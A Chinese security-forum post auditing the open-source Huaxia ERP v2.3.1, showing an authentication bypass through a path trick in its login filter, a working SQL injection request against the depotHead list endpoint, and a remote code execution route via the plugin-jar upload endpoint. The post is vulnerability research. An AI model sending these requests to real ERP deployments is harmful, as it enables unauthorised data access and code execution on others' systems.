问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
某开源ERP最新版SQL与RCE的审计过程
## 前言 代码路径 ``` https://gitee.com/jishenghua/JSH_ERP ``` 软件版本 ``` 华夏ERP_v2.3.1 ``` 源码审计的流程都是一样,从外部输入点开始跟踪数据流,判断数据处理过...
前言 -- 代码路径 ```php https://gitee.com/jishenghua/JSH_ERP ``` 软件版本 ```php 华夏ERP_v2.3.1 ``` 源码审计的流程都是一样,从外部输入点开始跟踪数据流,判断数据处理过程中是否存在一些常见的漏洞模式,比如外部数据直接拼接到SQL语句,就导致了SQL注入漏洞。 对于Web应用来说常见外部数据入口有 - Filter - 处理Url请求的Controller 查找这些入口的方式有很多,比如查看系统配置文件(web.x ml),查看对应注解,或者先抓包找到想看的请求,然后根据字符串来进行定位。 找到入口后就是跟踪数据流,着重关注权限检查、数据过滤、以及平时积累的漏洞模式(XXE、SQL注入等) 认证绕过 ---- 系统存在一个 fliter,在 `LogCostFilter` 里面会检查 `session` 来判断用户是否登录,如果没有登录就会让他重定向到 `login.html` ,与漏洞相关代码如下 ```php @WebFilter(filterName = "LogCostFilter", urlPatterns = {"/*"}, initParams = {@WebInitParam(name = "ignoredUrl", value = ".css#.js#.jpg#.png#.gif#.ico"), @WebInitParam(name = "filterPath", value = "/user/login#/user/registerUser#/v2/api-docs")}) public class LogCostFilter implements Filter { @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { HttpServletRequest servletRequest = (HttpServletRequest) request; HttpServletResponse servletResponse = (HttpServletResponse) response; String requestUrl = servletRequest.getRequestURI(); //具体,比如:处理若用户未登录,则跳转到登录页 O bject userInfo = servletRequest.getSession().getAttribute("user"); if(userInfo!=null) { //如果已登录,不阻止 chain.doFilter(request, response); return; } if (requestUrl != null && (requestUrl.contains("/doc.html") || requestUrl.contains("/register.html") || requestUrl.contains("/login.html"))) { chain.doFilter(request, response); return; } ``` 首先通过 getRequestURI 获取到请求 url,然后判断 session 中是否存在 user 属性,如果不为null,就表示已经登录了直接放行,否则会对 requestUrl 进行判断,如果包含 login.html、doc.html、register.html就表示不需要登录直接放行,但是这里使用的是 contains 方法,只要字符串里面带这些字符串即可通过校验 poc ```php GET /depotHead/login.html/../list?search=aaa&currentPage=1&pageSize=10&t=1618229175662 HTTP/1.1 Host: 192.168.245.1:9978 Accept: application/json, text/j avas cript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 X-Requested-With: x mlHttpRequest Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` 使用上面请求即可访问到 `/depotHead/list` 对于的 `controller`. sql注入 ----- payload ```php GET /depotHead/login.html/../list?search=%7B%22type%22%3A%22%E5%85%B6%E5%AE%83%22%2C%22subType%22%3A%22%E9%87%87%E8%B4%AD%E8%AE%A2%E5%8D%95'%20or%20''%3D'%22%2C%22roleType%22%3A%22%E5%85%A8%E9%83%A8%E6%95%B0%E6%8D%AE%22%2C%22status%22%3A%22%22%2C%22number%22%3A%22%22%2C%22beginTime%22%3A%22%22%2C%22endTime%22%3A%22%22%2C%22materialParam%22%3A%2222222222222222%22%2C%22depotIds%22%3A%22%22%7D&currentPage=1&pageSize=10&t=1618229175662 HTTP/1.1 Host: 192.168.245.1:9978 Accept: application/json, text/j avas cript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 X-Requested-With: x mlHttpRequest Referer: http://192.168.245.1:9978/pages/bill/purchase_orders_list.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` 处理函数时 `getDepotHeadList` ![](https://shs3.b.qianxin.com/attack_forum/2021/05/attach-b589f6b4d94c850877e94c3c0ea284bd2ea20d7e.png) 可以看到 `subType` 里面有注入的数据,继续跟进 ![](https://shs3.b.qianxin.com/attack_forum/2021/05/attach-8eb66bbfb47b7effdeb674e14d6e0a521e82f4c5.png) `selectByConditionDepotHead` 应该是 配置`mybatis` 时需要的方法,安装 `MyBatisCodeHelper-Pro` 插件后点击方法左边的logo即可跳转到对应的x ml配置文件 ![](https://shs3.b.qianxin.com/attack_forum/2021/05/attach-1f2fb9f4832201817b962b6237777b4c892a6a66.png) 可以看到配置文件使用 `$` 对用户数据进行拼接,导致`SQL`注入 ![](https://shs3.b.qianxin.com/attack_forum/2021/05/attach-05991131c508b2d14c57e8c15d3e2578f2c640f6.png) 在分析过程中可以在 `application.properties` 里面增加配置,让 `mybatis` 打印出会执行的 `sql` 语句 ```php logging.level.com.jsh.erp.datasource.mappers.*=debug ``` 最后执行的 `sql` 语句如下 ```php Execute SQL:SELECT COUNT(1) FROM (SELECT DISTINCT dh.* FROM jsh_depot_head dh LEFT JOIN jsh_depot_item di ON dh.Id = di.header_id AND ifnull(di.delete_flag, '0') != '1' LEFT JOIN jsh_material m ON di.material_id = m.Id AND ifnull(m.delete_Flag, '0') != '1' WHERE 1 = 1 AND dh.type = '其它' AND dh.sub_type = '采购订单' OR '' = '' AND (m.name LIKE '%22222222222222%' OR m.standard LIKE '%22222222222222%' OR m.model LIKE '%22222222222222%') AND ifnull(dh.delete_Flag, '0') != '1') tb ``` 可以看到 `sql` 语句被注入成了恒等,所以会把所有数据返回。 ![](https://shs3.b.qianxin.com/attack_forum/2021/05/attach-1037654282fe85309dfb3a0cda3469cfe5c00f42.png) RCE --- 软件有一个"隐藏"的Controller ```php /** * 上传并安装插件。注意: 该操作只适用于生产环境 * @param multipartFile 上传文件 multipartFile * @return 操作结果 */ @PostMapping("/uploadInstallPluginJar") public String install(@RequestParam("jarFile") MultipartFile multipartFile){ try { if(pluginOperator.uploadPluginAndStart(multipartFile)){ return "install success"; } else { return "install failure"; } } catch (Exception e) { e.printStackTrace(); return "install failure : " + e.getMessage(); } } ``` 用户可以上传一个符合格式的`jar`包到这个接口,这里就会通过 `uploadPluginAndStart` 上传并安装插件,插件的格式可以参考下面链接 ```php https://gitee.com/starblues/springboot-plugin-f ramework-parent ``` 需要额外注意的一点是,编译出来的demo插件,需要修改jar包的manifest文件,增加几个字段 ![](https://shs3.b.qianxin.com/attack_forum/2021/05/attach-694916f7ee4b32214536a48f51e6404345186923.png) 在 `DefinPlugin` 类里面增加恶意代码,当插件加载后就会执行。 ![](https://shs3.b.qianxin.com/attack_forum/2021/05/attach-211653eb99e42f416b8eb39c25d172abfb921f03.png) 当前版本有一个限制,或者说该功能有bug,需要手动创建 `plugins` 目录(或者系统之前已经安装过插件)才能安装新插件到该目录。
发表于 2021-05-14 21:57:26
阅读 ( 7519 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
hac425
19 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!